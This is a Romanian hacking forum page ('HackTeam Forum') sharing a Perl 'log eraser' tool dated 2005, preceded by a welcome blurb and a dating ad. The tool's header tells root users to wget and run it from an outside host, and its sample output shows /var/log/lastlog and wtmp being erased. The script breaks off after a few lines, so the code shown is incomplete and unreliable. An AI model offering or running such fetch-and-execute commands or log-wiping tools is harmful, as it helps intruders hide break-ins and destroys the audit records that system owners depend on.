Bine ati venit pe HackTeam Forum !
Aici veti gasi o gama larga de metode de hack atat pe Windows cat si pe platforme Linux/Unix , programe in consecinta ,tutoriale .
In acelasi timp aici veti gasi si asistenta help in materie corespunzatoare . Precizam ca tot ce se gaseste pe acest site este doar in scop de dezvoltare iar voi va asumati intreaga raspundere pt actiunile pe care le savarsiti . || SS-TEAM || Va Multumeste pt vizita !
|
Lista Forumurilor Pe Tematici
|
Bine ati venit pe HackTeam Forum ! | Reguli | Inregistrare | Login
POZE BINE ATI VENIT PE HACKTEAM FORUM !
Nu sunteti logat.
|
Nou pe simpatie: Sophya
 | Femeie 25 ani Bucuresti cauta Barbat 25 - 54 ani |
|
|
Code:
#########################################################################################################
# log eraser MSRLE v0.1 #
# #
# coded by PRI[ll #
# #
# 03/07/2005 #
# #
# Morocco.security.rulz /s irc.gigachat.net -j #MSR #
# #
# usage:(you should run this tool as root (sure =))) exemple: #
# #
# [ :/root]# wget www.go0gler.com/MSRLE;chmod 777 MSRLE;./MSRLE #
# !!!!! MSRLE v0.1!!!!! #
# !!!!coded by PRI[ll!!!! #
# [*]erasing default log files (too fast =)) #
# [*]/var/log/lastlog -erased Ok #
# [*]/var/log/wtmp -erased Ok #
# [*]/etc/wtmp - No such file or directory #
# #
#########################################################################################################
#!usr/bin/perl
use strict;
print "!!!!! MSRLE v0.1!!!!!n";
print "Morocco.Security.Rulz.Log.Erasern";
print "!!!!coded by PRI[ll!!!!n";
system "echo -e " |
| |